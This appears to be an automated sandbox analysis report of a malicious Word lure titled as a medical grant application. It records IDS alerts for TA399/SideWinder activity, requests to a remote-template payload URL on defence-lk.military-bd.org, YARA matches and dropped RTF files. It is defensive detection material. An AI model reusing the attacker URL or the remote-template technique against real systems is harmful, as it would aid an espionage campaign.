Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49169
Source: global trafficTCP traffic: 192.168.2.22:49169 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49169 -> 5.255.125.140:443
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49169
Source: global trafficTCP traffic: 192.168.2.22:49169 -> 5.255.125.140:443
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49169
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49169
Source: global trafficTCP traffic: 192.168.2.22:49169 -> 5.255.125.140:443
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49169
Source: global trafficTCP traffic: 192.168.2.22:49169 -> 5.255.125.140:443
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49169
Source: global trafficTCP traffic: 192.168.2.22:49169 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49169 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49170 -> 5.255.125.140:443
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49170
Source: global trafficTCP traffic: 192.168.2.22:49170 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49170 -> 5.255.125.140:443
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49170
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49170
Source: global trafficTCP traffic: 192.168.2.22:49170 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49170 -> 5.255.125.140:443
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49170
Source: global trafficTCP traffic: 192.168.2.22:49170 -> 5.255.125.140:443
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49170
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49170
Source: global trafficTCP traffic: 192.168.2.22:49170 -> 5.255.125.140:443
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49170
Source: global trafficTCP traffic: 192.168.2.22:49170 -> 5.255.125.140:443
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49170
Source: global trafficTCP traffic: 192.168.2.22:49170 -> 5.255.125.140:443
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49170
Source: global trafficTCP traffic: 192.168.2.22:49170 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49170 -> 5.255.125.140:443
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49170
Source: global trafficTCP traffic: 192.168.2.22:49170 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49170 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 5.255.125.140:443
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 5.255.125.140:443
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 5.255.125.140:443
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 5.255.125.140:443
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 5.255.125.140:443
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 5.255.125.140:443
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 5.255.125.140:443
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 5.255.125.140:443
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 5.255.125.140:443
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 5.255.125.140:443
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 5.255.125.140:443
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 5.255.125.140:443
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 5.255.125.140:443
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 5.255.125.140:443
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49173
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 5.255.125.140:443
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49173
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49173
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 5.255.125.140:443
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49173
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49173
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 5.255.125.140:443
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49173
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49173
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49173
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 5.255.125.140:443
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49173
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 5.255.125.140:443
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 5.255.125.140:443
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 5.255.125.140:443
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 5.255.125.140:443
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 5.255.125.140:443
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 5.255.125.140:443
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 5.255.125.140:443
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49175
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 5.255.125.140:443
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49175
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49175
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 5.255.125.140:443
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49175
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 5.255.125.140:443
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49175
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49175
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49175
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 5.255.125.140:443
Source: global trafficTCP traffic: 5.255.125.140:443 -> 192.168.2.22:49175
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 5.255.125.140:443
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 5.255.125.140:443

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2033858 - Severity 1 - ET MALWARE TA399/Sidewinder Activity Payload Request M2, Microsoft Office UA Request for .rtf : 192.168.2.22:49168 -> 5.255.125.140:443
Source: Network trafficSuricata IDS: 2033858 - Severity 1 - ET MALWARE TA399/Sidewinder Activity Payload Request M2, Microsoft Office UA Request for .rtf : 192.168.2.22:49164 -> 5.255.125.140:443
Source: Network trafficSuricata IDS: 2033858 - Severity 1 - ET MALWARE TA399/Sidewinder Activity Payload Request M2, Microsoft Office UA Request for .rtf : 192.168.2.22:49174 -> 5.255.125.140:443
Source: Network trafficSuricata IDS: 2055081 - Severity 1 - ET MALWARE TA399/Sidewinder Activity Payload Request M1, Microsoft Outlook UA Request for .rtf : 192.168.2.22:49168 -> 5.255.125.140:443
Source: Network trafficSuricata IDS: 2055081 - Severity 1 - ET MALWARE TA399/Sidewinder Activity Payload Request M1, Microsoft Outlook UA Request for .rtf : 192.168.2.22:49174 -> 5.255.125.140:443
Source: Network trafficSuricata IDS: 2055081 - Severity 1 - ET MALWARE TA399/Sidewinder Activity Payload Request M1, Microsoft Outlook UA Request for .rtf : 192.168.2.22:49164 -> 5.255.125.140:443
Source: Joe Sandbox ViewASN Name: LITESERVERNL LITESERVERNL
Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: Network trafficSuricata IDS: 2055129 - Severity 1 - ET MALWARE Possible TA399/SideWinder Related Empty .rtf Inbound : 5.255.125.140:443 -> 192.168.2.22:49164
Source: Network trafficSuricata IDS: 2055129 - Severity 1 - ET MALWARE Possible TA399/SideWinder Related Empty .rtf Inbound : 5.255.125.140:443 -> 192.168.2.22:49168
Source: Network trafficSuricata IDS: 2055129 - Severity 1 - ET MALWARE Possible TA399/SideWinder Related Empty .rtf Inbound : 5.255.125.140:443 -> 192.168.2.22:49174
Source: global trafficHTTP traffic detected: GET /MedicalGrantForm/11d601c6/Profile.rtf HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: defence-lk.military-bd.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /MedicalGrantForm/11d601c6/Profile.rtf HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: defence-lk.military-bd.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /MedicalGrantForm/11d601c6/Profile.rtf HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: defence-lk.military-bd.orgConnection: Keep-Alive
Source: unknownHTTPS traffic detected: 5.255.125.140:443 -> 192.168.2.22:49162 version: TLS 1.0
Source: unknownHTTPS traffic detected: 5.255.125.140:443 -> 192.168.2.22:49163 version: TLS 1.0
Source: unknownHTTPS traffic detected: 5.255.125.140:443 -> 192.168.2.22:49167 version: TLS 1.0
Source: unknownHTTPS traffic detected: 5.255.125.140:443 -> 192.168.2.22:49173 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B41141A1-1342-4534-87E0-085337AD5912}.tmpJump to behavior
Source: global trafficHTTP traffic detected: GET /MedicalGrantForm/11d601c6/Profile.rtf HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: defence-lk.military-bd.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /MedicalGrantForm/11d601c6/Profile.rtf HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: defence-lk.military-bd.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /MedicalGrantForm/11d601c6/Profile.rtf HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: defence-lk.military-bd.orgConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: defence-lk.military-bd.org
Source: 11d601c6 on defence-lk.military-bd.org.url.0.drString found in binary or memory: https://defence-lk.military-bd.org/MedicalGrantForm/11d601c6/
Source: ~WRF{7B8F8993-2CAB-4ED4-96F6-4F44F9217D9B}.tmp.0.drString found in binary or memory: https://defence-lk.military-bd.org/MedicalGrantForm/11d601c6/P
Source: ~WRS{6316F4BA-3B9F-4B2D-9F83-93B5CF3E590F}.tmp.0.dr, Profile.rtf.url.0.dr, ~WRF{7B8F8993-2CAB-4ED4-96F6-4F44F9217D9B}.tmp.0.drString found in binary or memory: https://defence-lk.military-bd.org/MedicalGrantForm/11d601c6/Profile.rtf
Source: ~WRF{7B8F8993-2CAB-4ED4-96F6-4F44F9217D9B}.tmp.0.drString found in binary or memory: https://defence-lk.military-bd.org/MedicalGrantForm/11d601c6/Profile.rtfyX
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49169
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
Source: unknownNetwork traffic detected: HTTP traffic on port 49162 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
Source: unknownNetwork traffic detected: HTTP traffic on port 49164 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49164
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49162
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49161
Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49174 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49161 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49175
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49174
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49173
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49172
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49171
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
Source: unknownNetwork traffic detected: HTTP traffic on port 49175 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49171 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49173 -> 443
Source: unknownHTTPS traffic detected: 5.255.125.140:443 -> 192.168.2.22:49161 version: TLS 1.2

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: _rels\document.xml.rels, type: SAMPLEMatched rule: Detects XML relations where an OLE object is refrencing an external target in dropper OOXML documents Author: ditekSHen
Microsoft Office drops suspicious files
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Profile.rtf.urlJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\11d601c6 on defence-lk.military-bd.org.urlJump to behavior
Source: ~WRF{7B8F8993-2CAB-4ED4-96F6-4F44F9217D9B}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: _rels\document.xml.rels, type: SAMPLEMatched rule: INDICATOR_OLE_RemoteTemplate author = ditekSHen, description = Detects XML relations where an OLE object is refrencing an external target in dropper OOXML documents
Source: classification engineClassification label: mal80.evad.winDOCX@1/25@9/1
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$NA_Updated_Medical_Grant_Application(1).docxJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR7EFE.tmpJump to behavior
Source: ~WRD0000.tmp.0.drOLE indicator, Word Document stream: true
Source: ~WRF{7B8F8993-2CAB-4ED4-96F6-4F44F9217D9B}.tmp.0.drOLE document summary: title field not present or empty
Source: ~WRF{7B8F8993-2CAB-4ED4-96F6-4F44F9217D9B}.tmp.0.drOLE document summary: author field not present or empty
Source: ~WRF{7B8F8993-2CAB-4ED4-96F6-4F44F9217D9B}.tmp.0.drOLE document summary: edited time not present or 0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: SLNA_Updated_Medical_Grant_Application(1).LNK.0.drLNK file: ..\..\..\..\..\Desktop\SLNA_Updated_Medical_Grant_Application(1).docx
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: ~WRD0000.tmp.0.drInitial sample: OLE zip file path = docProps/custom.xml
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: ~WRD0000.tmp.0.drInitial sample: OLE indicators vbamacros = False

Persistence and Installation Behavior

barindex
Microsoft Office launches external ms-search protocol handler (WebDAV)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \Device\RdpDr\;:1\defence-lk.military-bd.org@SSL\DavWWWRootJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \Device\RdpDr\;:1\defence-lk.military-bd.org@SSL\DavWWWRootJump to behavior
Contains an external reference to another file
Source: _rels\document.xml.relsExtracted files from sample: https://defence-lk.military-bd.org/medicalgrantform/11d601c6/profile.rtf
Office drops RTF file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile dump: Profile[1].rtf.0.drJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile dump: 313CC648.rtf.0.drJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile dump: Profile[1].rtf0.0.drJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile dump: E1F7FA9F.rtf.0.drJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile dump: 66A6FD05.rtf.0.drJump to dropped file
Office viewer loads remote template
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXESection loaded: netapi32.dll and davhlpr.dll loadedJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
